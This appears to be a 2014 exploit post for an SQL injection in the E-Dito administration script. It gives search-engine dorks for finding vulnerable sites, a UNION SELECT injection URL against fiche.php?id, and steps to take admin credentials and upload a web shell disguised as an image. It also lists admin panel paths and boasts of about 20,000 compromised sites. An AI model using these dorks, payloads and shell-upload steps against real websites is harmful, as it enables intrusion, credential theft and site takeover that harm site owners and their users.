facebook facebook twitter rss

E-Dito Administration Script Sql Injection

Author: R3Z0UK4 , Published: 20-05-2014
                      E-Dito administration script SQL Injection

===================================================================



####################################################################

#.:. Exploit Title : E-Dito Administration Script Sql Injection #

# .:. Author : R3Z0UK4 #

#.:. Contact : [fikorezouka(at)gmail(dot)com] #

#.:. Dork : inurl:fiche.php?id= #

#.:. Dork 2 : inurl:admin/fiche.php?id= #

#.:. Tested on : win&linux #

#.:. Vendor's Website : http://www.e-dito.net/ #

#.:. Date : [2014/5/19] #
####################################################################

VULNERABILITY

##############
[~] VULNERABILITY}~~



[~] www.site.com/fiche.php?id=[SQL INJECTION]
[~] www.site.com/admin/fiche.php?id=[SQL INJECTION]

#########

P0C

#########

Type: String Mysql Injection



http://SITE/fiche.php?id=[SQL INJECTION]



http://site/fiche.php?id=175+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,version%28%29,32%20--

####################################################################
Get Admin Infos (this should be easy x0)
then login and upload your shell.php.jpg
Temper or liveHttp Header shoudl solve this S#17 :D
Enjoy
About #20K Infected Websites :v

You Can Find The Admin Panel @ http://site/admin/admin.php
or http://site/user/
or http://site/login/
#########################################################################
GreetZ Goes To:Vatou-Ge Ek-Microsoft-Dz-CapiLo-DzMindInjector...and many more
#########################################################################

Like us on Facebook :